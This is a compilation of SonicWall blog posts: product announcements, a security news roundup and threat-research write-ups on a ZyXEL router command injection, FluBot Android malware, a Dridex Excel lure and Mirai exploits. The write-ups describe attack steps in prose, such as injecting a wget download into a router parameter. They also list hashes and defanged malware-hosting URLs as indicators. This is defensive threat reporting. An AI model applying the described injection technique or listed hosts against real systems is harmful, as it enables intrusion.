Announcing Wireless Network Manager for Unified Wired and Wireless Management

Wireless devices are driving digital transformation to the cloud. Today 94% of enterprises use the cloud, and 94% of SMBs report security benefits after moving to the cloud. And this year, worldwide wireless device adoption has exploded to 22 billion. As a result, securing and managing wireless networks has become more challenging.

SonicWall Wireless Network Manager provides integrated management of SonicWave Access Points and SonicWall Switches for unified visibility and control of wired and wireless networks. This cloud-based management solution is designed to be user-friendly while simplifying access, control and troubleshooting capabilities.

Single-Pane-of-Glass Management

Global networks can be managed easily from a single pane of glass with Wireless Network Manager — which is a part of the SonicWall Capture Security Center ecosystem. Being highly scalable, it is suitable for organizations of any size. Everything from single-site wireless deployments to vast enterprise networks can be easily overseen with the Wireless Network Manager.

Scalability and Unified Policy

This dashboard unifies multiple tenants, locations and zones while simultaneously supporting tens of thousands of SonicWave access points and SonicWall Switches. Create a unified wired and wireless policy at the tenant level and push that down to various locations and zones. Drill down on managed devices for more granular data. Receive firmware and security updates from the cloud automatically so that your devices are always up to date.

Reliable Operation

Since the Wireless Network Manager controls only the management plane functions of the access points and switches, internet outages do not impact their performance. Although there is a temporary loss in management capability, access points and switches continue to work seamlessly, ensuring business continuity.

Zero-Touch Deployment

The Zero-Touch Deployment (ZTD) feature of SonicWave access points and SonicWall Switches ensures that onboarding is automated and the network is up in minutes. Provisioning these devices is simple and can be done remotely, saving both time and money. Just register and onboard the devices from anywhere with the SonicExpress app — once the devices are connected and turned on, ZTD authenticates, associates and configures them automatically.

Advanced Analysis Tools

Once the access points are registered and onboarded and prior to access point deployment, performing a wireless site survey ensures increased workforce productivity. SonicWall WiFi Planner tool, which is available within Wireless Network Manager, is the ideal enablement tool to plan smarter and eliminate costly installation mistakes. This tool enables administrators to optimally plan and deploy a wireless network for enhanced WiFi user experience. Additionally, WNM’s Topology tool provides network topology maps and managed device statistics.

Lower TCO

Cloud-based WNM drives down total cost of ownership by shifting capital expenditures (CAPEX) to operating expense (OPEX). WNM cuts out the cost and maintenance of redundant hardware-based controllers and optimizes data center rack space, and its intuitive interface reduces training and administrative overhead costs.

Regardless of the size of your organization, SonicWall Wireless Network Manager offers unified visibility and control in a secure, Wi-Fi cloud-managed solution. To learn more, visit

NSM On-Prem vs. NSM SaaS: Which Is Best for You?

SonicWall’s Network Security Manager (NSM) provides centralized management, 360-degree control and unparalleled visibility into network security infrastructures utilizing SonicWall Next-Generation Firewalls (NGFW).

NSM offers two deployment options: on cloud and on-prem. If you’re wondering which is the best fit for your environment, here are some factors to consider:

  • Understanding Your Business Needs: The emergence of cloud computing has allowed companies to shift the management and maintenance of their IT infrastructure to their cloud provider, thereby reducing their operational costs. SonicWall reduces your operational overhead in much the same way by hosting and maintaining the web-based NSM SaaS application on the cloud. NSM SaaS is a scalable, cloud-native offering that’s easy to deploy. It is ideal for the security needs of any business, particularly a small or medium-sized business, that wants to minimize their day-to-day IT costs and offload their operational and deployment challenges to SonicWall. But say you have a well-established IT infrastructure of your own and customization is key for you — for example, a managed security service provider (MSSPs) with a dedicated IT team to deploy, constantly monitor and maintain on-prem systems for clients. In that case, NSM on-prem would be the better choice. This option also offers full control over the scaling of your on-prem system to quickly facilitate on-demand growth.
  • Feature Parity: NSM SaaS and NSM on-prem use a unified code base — meaning you’ll get the same management capabilities on both. In other words, features like device groups, tenant management, user management, templates, commit and auditing workflow, etc., will be the same. But the NSM 2.2 release brings along a few more NSM on-prem-specific security and deployment features:
    • Closed Network Support: A closed network is a private network that is completely shut off from the outside environment and has no internet connectivity. NSM 2.2 helps preserve the privacy and security of closed networks by offering an airgap method for onboarding and licensing SonicWall firewall devices managed by NSM — meaning you won’t have to contact License Manager (LM) or (MSW).
    • User Access Controls: You can prevent unauthorized individuals from gaining access to your on-prem environment through enhanced security features. These include account lockout based on number of unsuccessful login attempts, two-factor authentications through Microsoft or Google authenticator apps, whitelisting IP addresses, and so on.
    • High Availability Support: To ensure there is no single point of failure and to provide uninterrupted access to NSM, the NSM 2.2 release lets users associate a secondary node to their primary node with similar settings.
    • Deployment Flexibility: NSM on-prem can now be deployed on Azure, KVM, ESXi and Hyper-V platforms. It requires a minimum system requirement of 16 GB RAM and 4 core CPU.
  • Licensing: Both NSM SaaS and NSM on-prem are based on subscription licensing models. NSM SaaS licensing depends on firewall type and has two available options, NSM Essentials and NSM Advanced. NSM Essentials offers full management capability with seven days of reporting, whereas NSM Advanced contains full management capability with 365 days of reporting and 30 days of Analytics. NSM on-prem licensing is node-based, with a base license of five nodes and add-on licenses. Currently, NSM on-prem has full management capabilities only. On-prem Analytics can be used as an add-on license for data reporting and analytics.

In summary, NSM on-prem is ideal for deployments requiring tighter system and data security controls, such as a closed network environment. But if you’re looking for on-demand scaling and a modern, cloud-native architecture, NSM SaaS is the best fit for you. Either way, you’ll get everything you need for comprehensive firewall management. And whatever you choose, you can rest assured that SonicWall is committed to providing you with impeccable support and a comprehensive feature set.

CSa 1.2: Advanced, Closed-Network Threat Protection

With the introduction of SonicWall CSa 1000, we brought the threat prevention capabilities of Capture ATP and our patented Real-Time Deep Memory Inspection™ (RTDMI) on prem — allowing government, healthcare and other organizations subject to compliance or data residency restrictions to utilize similar protection formerly offered only in the cloud.

But at the time, using these appliances still required admins to connect to the cloud to check for previously registered verdicts for files.

With the introduction of Capture Security appliance 1.2 (CSa 1.2), however, we have eliminated this requirement, further strengthening our commitment to preserving the privacy and security of closed networks for our most compliance- and security-sensitive customers.

CSa can now be deployed in closed, air-gapped networks, behind other vendor firewalls and/or proxies. To further support these types of networks, we are preparing the FIPS 140-2 certification for the CSa.

CSa is designed to be an on-premises malware detection appliance, giving IT administrators the power of RTDMI when analyzing suspicious files. It analyzes a broad range of file types, detecting and blocking threats that target zero-day exploits, suspicious files and even side-channel attacks, such as Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS and TPM-Fail.

This update also includes improvements to automation and usability. We are expanding the API’s ability from just the submission of files to also include the management of users and devices, and the ability to add or remove users and devices from the “allow” list within CSa.

Furthermore, to limit the potential for one or more of your sources to overuse the CSa, we added rate limiting by source. With the introduction of this feature, you can now select how may files per hour or per day a particular device can submit to the CSa.

For more information about CSa, please visit our website or contact your sales representative for a list of other usability enhancements.

Cybersecurity News & Trends – 03-19-21

This week, SonicWall released its biggest trove of threat intelligence yet: The 2021 SonicWall Cyber Threat Report.

SonicWall in the News

Microsoft Office Files Now Used By Hackers to Spread Malware: IoT Under Attack — Tech Times

  • Tech Times covered SonicWall’s 2021 Cyber Threat Report, highlighting the surge in malicious Office file attacks.

Election security report calls out Russian, Iranian influence ops. Remediation progress. Ukraine finds Russian cyberespionage — CyberWire

  • SonicWall’s 2021 Cyber Threat Report was included under the “Cyber Trends” section of the newsletter.

Threat Actors Thriving on the Fear and Uncertainty of Remote Workforces — Help Net Security

  • Help Net Security shared an article on SonicWall’s 2021 Threat Report, highlighting that cyber criminals preyed on the new remote work reality.

Ransomware Up 62 Percent Since 2019 — BetaNews

  • BetaNews shared an article on SonicWall’s 2021 Threat Report, highlighting the growth in ransomware.

New SonicWall 2020 Research Shows Cyber Arms Race At Tipping Point — CRN

  • This article features the findings from SonicWall’s 2021 Cyber Threat Report.

SonicWall: Pandemic exposes record-breaking cyber attacks — Mobile News

  • This article features the findings from SonicWall’s 2021 Cyber Threat Report.

Ransomware and IoT Malware Detections Surge By Over 60% — InfoSecurity Magazine

  • InfoSecurity Magazine covered SonicWall’s 2021 Cyber Threat Report, highlighting the double-digit surge in ransomware and IoT malware.

Cybercrime Saw an ‘Explosion’ in 2020 — ITProPortal

  • ITProPortal covered SonicWall’s 2021 Cyber Threat Report, highlighting that ransomware, cryptojacking and malicious Office files were the most popular vectors for cybercrime in 2020.

ChannelPro Weekly Podcast: Episode #178 — ChannelPro Weekly Podcast

  • This podcast features an interview with Dmitriy discussing the impact the pandemic had on cybersecurity and the cybersecurity trends of 2021.

Industry News

More than $4 billion in cybercrime losses reported to FBI in 2020 — FBI Internet Crime Report 2021

  • American victims reported $4.2 billion in losses as a result of cybercrime and internet fraud to the FBI in 2020, a roughly 20% uptick from 2019.

Attackers are trying awfully hard to backdoor iOS developers’ Macs — Ars Technica

  • Researchers said they’ve found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

Ransom Payments Have Nearly Tripled — Dark Reading

  • In 2020, ransomware targeted the manufacturing sector, healthcare organizations and construction companies, with the average ransom reaching $312,000, a report finds.

U.S. taxpayers targeted with RAT malware in ongoing phishing attacks — Bleeping Computer

  • U.S. taxpayers are being targeted by phishing attacks attempting to take over their computers using malware and steal sensitive personal and financial information.

$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware — Threat Post

  • The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.

Mimecast Says SolarWinds Hackers Stole Source Code — SecurityWeek

  • Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack and revealed that the threat actor managed to steal some source code.

Buffalo Public Schools cancels classes after cyberattack — Cyberscoop

  • Ransomware attackers appear to have taken a swipe at Buffalo Public Schools in recent days, screeching the school system’s plans for remote classes and in-person learning to a halt on Friday.

FBI warns of escalating Pysa ransomware attacks on education orgs — Bleeping Computer

  • The Federal Bureau of Investigation (FBI) Cyber Division has warned system administrators and cybersecurity professionals of increased Pysa ransomware activity targeting educational institutions.

Bitcoin surges past $60,000 for first time — BBC

  • Bitcoin, which has more than tripled in value since the end of last year, has been powered on by well-known companies adopting it as a method of payment.

Exclusive: Microsoft could reap more than $150 million in new U.S. cyber spending, upsetting some lawmakers — Reuters

  • Microsoft stands to receive nearly a quarter of COVID-19 relief funds destined for U.S. cybersecurity defenders, angering some lawmakers who don’t want to increase funding for a company whose software was recently at the heart of two big hacks.

Molson Coors says cyberattack disrupted beer brewing — Cyberscoop

  • Molson Coors, one of the biggest beer companies in the U.S., didn’t provide many specifics about the cyberattack.

With Spectre Still Lurking, Google Looks to Protect the Web — Wired

  • Researchers from Google have developed a proof-of-concept that reveals the hazard Spectre assaults pose to the browser.

Ransomware now attacks Microsoft Exchange servers with ProxyLogon exploits — Bleeping Computer

  • A new ransomware called ‘DEARCRY’ is targeting Microsoft Exchange servers, with one victim stating they were infected via the ProxyLogon vulnerabilities.

In Case You Missed It

Attackers actively targeting vulnerable ZyXEL routers

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in ZyXEL products. TrueOnline is a major internet service provider in Thailand which distributes various rebranded ZyXEL routers to its customers.

Command Injection Vulnerability CVE-2017-18368

The ZyXEL P660HN-T router distributed by TrueOnline is prone to command injection vulnerability in the Remote System Log forwarding function. This function is accessible to an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.

The following exploit is spotted in the wild

This router has a command injection vulnerability in the Maintenance> Logs > System Log> Remote System Log forwarding function. The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The attacker takes advantage of the vulnerability to bypass authentication by appending commands to remote_host parameter via the POST request.

The attacker downloads a malicious executable by injecting “wget”  command and saves it in the tmp directory . Then they set the permissions  of malicious file to 777, meaning this file will be readable, writable and executable by all users . The attacker then executes the malicious files and deletes it to leave no trace.

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 15168: ZyXEL Products Command Execution (CVE-2017-18368)
    • GAV: Tsunami.DN

This vulnerability is patched.

Threat Graph




Android FluBot infections continue but with a dip in numbers

Four suspects were arrested in March 2021 in Barcelona in connection with the Android Banker FluBot. Majority of the malware’s victims are located in Spain. However even after the arrest FluBot continues to spread, albeit in lower numbers.

The chart below shows a dip in FluBot samples in March compared to the previous 2 months:


Common application names used by this campaign that we identified are:

  • FedEx
  • DHL

Common package names used by this campaign that we identified are:

  • com.tencent.mobileqq

Below is an analysis of a specific sample belonging to this campaign:

  • MD5: 1a2a4044cf18eed59e66c413db766145
  • Package Name:
  • Application Name: Fed Ex


The malware requests for the following permissions:

  • android.permission.CALL_PHONE
  • android.permission.FOREGROUND_SERVICE
  • android.permission.INTERNET
  • android.permission.NFC
  • android.permission.QUERY_ALL_PACKAGES
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.REQUEST_DELETE_PACKAGES
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_SMS

Few sensitive actions that can be performed using these permissions:

  • Access contacts
  • Place phone calls
  • Access SMS
  • Send SMS
  • Ignore battery optimizations, preventing the application from hibernating
  • Auto start the malware after device reboot
  • Access Internet

Upon installation the malware requests for Accessibility services:


In Android, the first screen that appears to the user is referred to as the Main Activity. This activity can be identified as the one with intent filter action as MAIN and category as LAUNCHER. For the FluBot malware in question, the activity identified as main activity cannot be located in the classes within the code tree:

This indicates that the real code with main activity might be a different file that is likely decrypted and dropped locally upon malware execution.

As expected a dex file gets dropped during execution in the app_apkprotector_dex folder locally as classes-v1.dex and classes-v1.bin:


The classes-v1.bin file is a .dex file in reality and this file contains the malicious code that gets executed during runtime. The main activity class that could not be located earlier can be seen in this file:


FluBot contains capabilities to receive the following commands and execute associated actions:


The command AMI_DEF_SMS_APP requests the user to set the FluBot app as the default SMS application on the device:


The command CARD_BLOCK shows a fake card details activity to the user which is used to steal Credit Card information:


FluBot makes it difficult to remove it from the device as it has access to accessibility services. If a victim tries the regular way of removing it by settings > apps > Fed Ex (or any other FluBot malware name) the malware force closes the settings app and displays the message “You can not perform this action on a service system”.


FluBot contains a Domain Generation Algorithm (DGA) using which it communicates with the C&C servers. As shown below, a single  apk contacts a number of different URLs:


SonicWall Capture Labs provide protection against this threat with the following signatures:

  • AndroidOS.FluBot.CL (Trojan)


Indicators of Compromise (IOC’s):

  • 1a2a4044cf18eed59e66c413db766145
  • 74f88d5480aefe165721c36100dcf89a
  • 3759f4ae5378372d34be6022c31c306c

Fake SpaceX Starbase Invite Excel document found distributing Dridex

The SonicWall Capture Labs Threat Research Team has observed that a fake Space Starbase Invite is being circulated over email with a malicious excel document as an attachment. On opening the attachment, it will execute VBA macro code to infect the system with Dridex malware.

Infection Cycle

Upon opening the attachment, the user is displayed instructions to enable content as shown below:

Fig-1: Excel File

The malicious excel file has obfuscated macro and a workbook_open method, which gets executed upon opening the document. The VBA Macro drops an XSL file into %appdata%\<random>.xsl.  The dropped XSL is then executed by passing it as an argument to WMIC (Windows Management Instrumentation Command-line utility).

Fig-2: VBA Macro creating XSL file

XSL file

XSL files are style sheets to process data in XLM files which also supports script embedding and execution. This old technique has been assigned Mitre ATT &CK ID: T1220.

The XSL file contains JScript code to download and execute the payload. The payload takes “validateLog” as an argument as shown below:

Fig-3: Contents of XSL file


SonicWall Capture ATP protects against this threat as shown below:

Fig-4: Capture ATP report


Indicators of Compromise

SHA256 of malicious excel files:

  • 21bf810cf015e8ffec9b844632a94274d9d387ad528e7d75adf116acea5a4d4b
  • 2355f05bca712ce31b1fef911395862eb34e73db7a3ca0a6bee2664024e47518
  • 376dad0f953db87ebfa71edb5173d4d8226c242d257a40cc9359f4d53b850aff
  • 466e4c5fe6b3c05ff34e487a0ba0910c1dc53b1c41ef1c27a779379bd2c9534d
  • 4d8ae33f7f5e41d9b3c3109daf043f5a803c639a68a697838bdcd17135c03730
  • 55a258190c8461b2aec9e698edb85297f2c850de44e6659529b00a0af7c98fe6
  • a5bc04a9b80ebb1b62367b8fec7463da3b0d096bc99c798f7ecf1f048580729c
  • af686418e437e9dca34e08381e3dc8e5f3aa06a458e610d9095ce2eb0a00ebc4
  • c83e3d04d0807dbb1144f776ab144e9b85c94b0c0e8ca05f78664e6e46f621cd
  • ee3755902532f4636d3a8a86de2f9bc13ae235a9220f97a8862d82bc52599066

Network Connections:

  • https://new[.]bombill[.]com/B2B/js/public_html/new[.]bombill[.]com/kML98YVm1[.]php
  • https://mishpachton[.]club/wp-content/uploads/2020/01/sULnmh1mel6Ha[.]php
  • https://hotelmarissa[.]ro/hms/highslide/graphics/outlines/aKBRsNGhkJnFy[.]php
  • https://lekkievents[.]com/RcjJztqmB3CJ[.]php
  • https://slasinfo[.]com/wp-content/plugins/better-wp-security/core/Z3w9lRfmiUeqn[.]php
  • https://turktech[.]co[.]uk/wp-content/uploads/2020/01/XBKtCe6h[.]php
  • https://marcosindiagroup[.]com/wp-content/uploads/elementor/css/Y1KA13a0oHq0vv[.]php
  • https://drakarys[.]rs/img/icons/tabs/xTPpiyC3[.]php
  • https://jettyplus[.]com/wp-includes/sodium_compat/namespaced/Core/n95mTqnEYm2lEqF[.]php
  • https://desertkingresort[.]com/wp-includes/js/mediaelement/renderers/Qh3RRz2g[.]php
  • https://elivebox[.]net/school/bower_components/chosen/docsupport/7Il9rC5wQ[.]php
  • https://eletronicaeduardo[.]com[.]br/www3/sistema/application/config/ANBPUKvb49gQn[.]php
  • https://mail[.]beetleorchid[.]in//i07uqfyKKQ3jUN8[.]php
  • https://nationalngofederation[.]com/wp-includes/SimplePie/Decode/HTML/CQiRG6YtYGt[.]php
  • https://leer-afrikaans[.]co[.]za/5TdZj0lfsvo[.]php
  • https://mail[.]account[.]inventorybiz[.]com//X70ySsjm2[.]php
  • https://elkytoursandtravel[.]com/wp-includes/SimplePie/Decode/HTML/i06d5d4XcypWc[.]php
  • https://drlamyas[.]net/wp-content/plugins/LayerSlider/classes/gt45kDacR6[.]php
  • https://one2onematch[.]net/back_up/under/fonts/Montserrat/kDCn9x8aeY8jz[.]php
  • https://centrodetraduccionespuce[.]com/intranet_old/css/vendor/square/risWzMrGzRtO4bS[.]php
  • https://askcon[.]net/wp-includes/SimplePie/Content/Type/0lOzUuHLScUH[.]php
  • https://crm[.]sgdatapos[.]com/modules/goals/language/bulgarian/vdOwNUr2yXh[.]php
  • https://lweonepal[.]com/wp-content/cache/object/013/bFPs28xfQyOe[.]php
  • https://triplonet[.]com[.]br/__MACOSX/wp-includes/js/codemirror/3Uqzx5RTyl8pT[.]php
  • https://casagrandecontabil[.]com[.]br/vo/vfm-admin/images/avatars/1Wu2EdUfRb3q7Zu[.]php
  • https://ppdb[.]smp1sbw[.]sch[.]id/ro-plugins/ckeditor/skins/moono-lisa/767884gnQIu[.]php
  • https://blog[.]garantitorna[.]com/wp-includes/css/dist/block-directory/j9nCiyCAcJQDh3[.]php
  • https://dikan[.]co[.]za/wsz2SCI6sU6k6o[.]php
  • https://elearn[.]empoweredmw[.]com/lib/minify/matthiasmullie-minify/data/WD3Uawo4EEZ[.]php
  • https://equiposautomotriz[.]com/wp-includes/Requests/Exception/HTTP/U997eIiQSqs3[.]php
  • https://familystory[.]es/wp-content/uploads/2021/01/InOm7e9u4vMmW[.]php
  • https://fortgem[.]co[.]uk/wp-includes/css/dist/block-directory/Pk57G2yz[.]php
  • https://sproca[.]tg/wp-content/themes/agronomics-lite/css/nj6N9LQhADNC[.]php
  • https://tarifacabins[.]com/wp-includes/js/mediaelement/renderers/KcsChOSuEV[.]php
  • https://gesky[.]co[.]tz/wp-includes/sodium_compat/namespaced/Core/HMJi1PQC[.]php
  • https://birkett[.]com[.]au/include/Base/Modules/Filter/KZyRSXJtoC[.]php
  • https://dentaldesignstudiowi[.]com/wp-content/uploads/2021/01/9eFsntMZ[.]php

SHA256 of Dridex payload:

  • a095a0ec3cd1655bbabad3f3b2e996521444c93dc51f1e78af878bfef3fd3ca8
  • c190c5a25b2616a4a0c4965d5f83cc47e47f2d2e4d2cab2c8987dcc29db290a3

Dropped Files:

  • %appdata%\<random>.xsl
  • C:\windows\Temp\<random>.dll

Punto di non ritorno: il nuovo rapporto di SonicWall registra un’impennata delle minacce e un cambio di paradigma storico

La cybersecurity è un settore dinamico in cui ogni anno compaiono nuovi vettori di attacco; gli obiettivi presi di mira cambiano e le tecniche del crimine informatico vengono perfezionate.

Ma pochi anni hanno portato ai cambiamenti che abbiamo visto nel 2020.

L’anno è stato segnato da due eventi storici: la pandemia di COVID-19 e l’attacco alla catena di fornitura di SolarWinds. Il primo evento ha causato una trasformazione così profonda da cambiare qualcosa di essenziale come il nostro modo di lavorare. Il secondo ha colpito al cuore il mondo dell’IT, innescando una reazione a catena che ha avuto ripercussioni su migliaia di aziende e rivelando un tipo di violazione che è praticamente immune a qualsiasi difesa esistente.

Nel frattempo i cybercriminali hanno perfezionato le loro tattiche, utilizzando strumenti basati sul cloud per portare le minacce a nuovi livelli. In molti casi le vittime sono proprio le persone meno attrezzate per contrastare i rischi: lavoratori da remoto non consapevoli dei rischi che esistono all’esterno del perimetro aziendale, strutture sanitarie in affanno, scuole e università impegnate nel passaggio alla didattica a distanza.

I ricercatori dei SonicWall Capture Labs hanno monitorato questi profondi cambiamenti in tempo reale e raccolto le loro informazioni nel Rapporto SonicWall 2021 sul Cybercrime. Ecco un’anticipazione di quello che hanno scoperto:

Il ransomware raggiunge un nuovo record

I prezzi record dei Bitcoin hanno favorito il vertiginoso aumento dei ransomware: SonicWall ha registrato un aumento dei tentativi di ransomware del 62% rispetto all’anno precedente.

Particolarmente preoccupante è stato il numero di tentativi basati su Ryuk, una nuova famiglia di ransomware in rapida crescita che continua a sviluppare nuove capacità, oltre a un forte aumento del volume di attacchi al settore sanitario.

La brevettata tecnologia RTDMI è più efficace che mai

Nel 2020, la tecnologia Real-Time Deep Memory InspectionTM (RTDMI) di SonicWall ha scoperto 268.362 varianti di malware ‘mai viste prima’, fino al 74% in più rispetto all’anno precedente. Oltre alla capacità essenziale di bloccare in tempo reale malware di massa sconosciuti, RTDMI consente di mitigare i devastanti attacchi al canale laterale, come l’attacco che sfrutta vulnerabilità dei chip M1 di Apple scoperta di recente.

Il malware IoT supera il 66%

Il numero di dispositivi IoT è in crescita da anni, ma la pandemia di COVID-19 ha accelerato questa tendenza, portando il numero di attacchi a 56,9 milioni – un aumento del 66% rispetto al 2019. Questo picco è stato ancora più consistente in Nord America, dove gli attacchi sono aumentati del 152%.

Il cryptojacking prosegue senza Coinhive

Bitcoin non è stata l’unica criptovaluta salita alle stelle nel 2020: anche i prezzi di Monero sono aumentati, portando il cryptojacking al livello più alto degli ultimi tre anni. Tuttavia, le previsioni sulla fine del cryptojacking non erano completamente sbagliate: il cryptojacking basato su browser ha mostrato un calo significativo, sebbene il numero di tentativi di cryptojacking basati su file sia ancora considerevole.

Aumentano i tentativi di intrusione, cambiano gli schemi di attacco

Nel 2020 i tentativi di intrusione hanno registrato un aumento generale del 112%, ma la natura di questi attacchi è cambiata. Gli attacchi Directory Traversal sono passati dal 21% al 34% del volume totale di tentativi maligni, mentre gli attacchi RCE hanno perso vigore, passando dal 21% al 16%.

Critical Vulnerabilities Of Network Security Devices Being Utilized By Mirai Botnet Malware

The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are affected by critical vulnerabilities. The following vulnerabilities are involved:

  • CVE-2020-25506: D-Link DNS-320 firewall exploit
  • CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
  • CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
  • CVE-2020-26919: Netgear ProSAFE Plus exploit
  • CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
  • CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

  • CVE-2020-25506
    IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
  • CVE-2021-27561/CVE-2021-27562
    IPS:15456 Yealink DM Remote Code Execution
  • CVE-2021-22502
    IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
  • CVE-2019-19356
    IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
    This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
    IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
    IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
  • GAV signatures to cover malware samples:
    GAV: Mirai.LL
    GAV: Mirai.LL_1


Tipping Point: SonicWall Exposes Soaring Threat Levels, Historic Power Shifts In New Report

Cybersecurity is a dynamic field, and each year brings the introduction of new attack vectors, shifts in favored targets, and refinements in cybercriminal techniques.

But very few years have brought the sort of change we saw in 2020.

“2020 offered a perfect storm for cybercriminals and a critical tipping point for the cyber arms race,” said SonicWall President and CEO Bill Conner in the official announcement. “The pandemic — along with remote work, a charged political climate, record prices of cryptocurrency, and threat actors weaponizing cloud storage and tools — drove the effectiveness and volume of cyberattacks to new highs. This latest threat intelligence offers a look at how cybercriminals shifted and refined their tactics, painting a picture of what they are doing amid the uncertain future that lies ahead.”

The year was bookended by two historic events: the COVID-19 pandemic and the SolarWinds supply-chain attack. The former brought disruption so deep it succeeded in changing something as basic as the very way we do work. The latter struck the IT world to its core, setting off a chain reaction that would impact thousands of businesses, pulling back the curtain on a type of breach impervious to virtually all existing defenses.

In between, cybercriminals ramped up their efforts, weaponizing cloud-based tools and driving many threat vectors to new levels. Too often, their prey consisted of those least equipped to bear it — remote workers unaware of the risks that exist outside the corporate perimeter, overwhelmed healthcare facilities, and schools and universities struggling to make the transition to remote learning.

SonicWall Capture Labs threat researchers were on hand to track these seismic shifts in real time, and we’ve compiled their insights in the 2021 SonicWall Cyber Threat Report. Here’s a preview of what they discovered:

Ransomware Sets New Record

Record highs in the price of Bitcoin helped push ransomware to new heights: SonicWall recorded a 62% year- over-year increase in the number of ransomware attempts.

Of particular concern was the number of attempts involving Ryuk, a newer but rapidly growing ransomware family that continues to gain new capabilities, as well as a sharp increase in the number of attacks on the healthcare industry.

Patented RTDMI More Formidable Than Ever

In 2020, SonicWall’s Real-Time Deep Memory InspectionTM (RTDMI) technology discovered 268,362 ‘never-before-seen’ malware variants, up 74% year-over-year. While the ability to block unknown mass-market malware in real time is crucial, RTDMI can also mitigate devastating side-channel attacks, such as the recently discovered attack affecting Apple M1 chips.

IoT Malware Jumps 66%

The number of IoT devices has been on the rise for years, but the COVID-19 pandemic accelerated this trend, pushing the number of attacks up to 56.9 million — a 66% increase over 2019. In North America, this spike was even more pronounced: attacks there rose a staggering 152%.

Cryptojacking Carries On Without Coinhive

Bitcoin wasn’t the only form of cryptocurrency to skyrocket in 2020: Monero prices also rose, helping to push cryptojacking to a three-year high. Predictions of cryptojacking’s demise weren’t completely off base, however: Browser-based cryptojacking did show a significant drop, though the amount of file-based cryptojacking attempts more than made up for it.

Intrusion Attempts Rise, Attack Patterns Change

2020 saw malicious intrusion attempts jump 112% overall — but the nature of these attacks also changed. Directory Traversal attempts jumped from 21% to 34% of total malicious attempts, while RCE attempts lost steam, falling from 21% to 16%.